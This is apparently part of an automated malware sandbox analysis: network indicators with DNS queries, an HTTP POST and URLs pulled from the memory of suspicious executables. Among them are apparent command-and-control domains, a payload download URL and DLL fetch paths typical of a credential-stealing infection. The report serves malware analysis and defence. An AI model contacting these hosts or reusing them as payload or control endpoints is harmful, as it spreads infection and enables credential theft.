Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: tacitglibbr.biz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shineugler.biz

Source: firefox.exe, 00000020.00000003.3086830516.000001D76ABCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe&G
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://185.215.113.206
Source: 232a1df2aa.exe, 0000000E.00000002.3235431166.000000000BE91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/405117-2476756634-1002
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllG
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllg
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllO
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/V
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001937000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019C6000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3235431166.000000000BE91000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 232a1df2aa.exe, 0000000E.00000002.3235431166.000000000BE91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp3
Source: 232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://185.215.113.206ones
Source: firefox.exe, 00000020.00000003.3346064434.000001D76F488000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3346064434.000001D76F481000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3253391019.000001D766768000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3077992000.000001D76B3EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000020.00000003.3094884941.000001D7662B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000020.00000003.3351738251.000001D76C3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000020.00000003.3340426056.000001D766FB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000020.00000003.2947408066.000001D763A8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2848798086.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853226348.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3292020914.000001D76AE99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2943605480.000001D76AE45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3266711378.000001D762FB6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3108371159.000001DA0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3129186444.000001D76B1EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2971960415.000001D76AEFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3297328168.000001D76B293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3038002099.000001D763A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AE99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3289452271.000001D766898000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3296269200.000001D7668F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2863058661.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2850940728.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3266711378.000001D762FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3271378134.000001D76B2A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3223066390.000001D765251000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3351738251.000001D76C3B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3113021133.000001D763A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: H9TU4oY.exe, 00000007.00000003.2593473526.0000000001649000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626351473.0000000001649000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932347589.000000000075F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908992218.000000000075F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 232a1df2aa.exe, 232a1df2aa.exe, 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000020.00000003.3086329199.000001D76AD50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000020.00000003.3088012935.000001D76ABB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3203110763.000001D76C593000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3249184967.000001D76C593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000020.00000003.3088012935.000001D76ABB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3360161737.000001D76ABB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: 232a1df2aa.exe, 0000000E.00000002.3243233421.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000020.00000003.3344983220.000001D76F760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2989724093.000001D76F760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000020.00000003.2989724093.000001D76F7B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3202108566.000001D76F7B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3228357542.000001D76AFF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3082473747.000001D76AFF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357985948.000001D76C044000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/
Source: H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api(
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou:443/api
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C05E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fa_
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp8
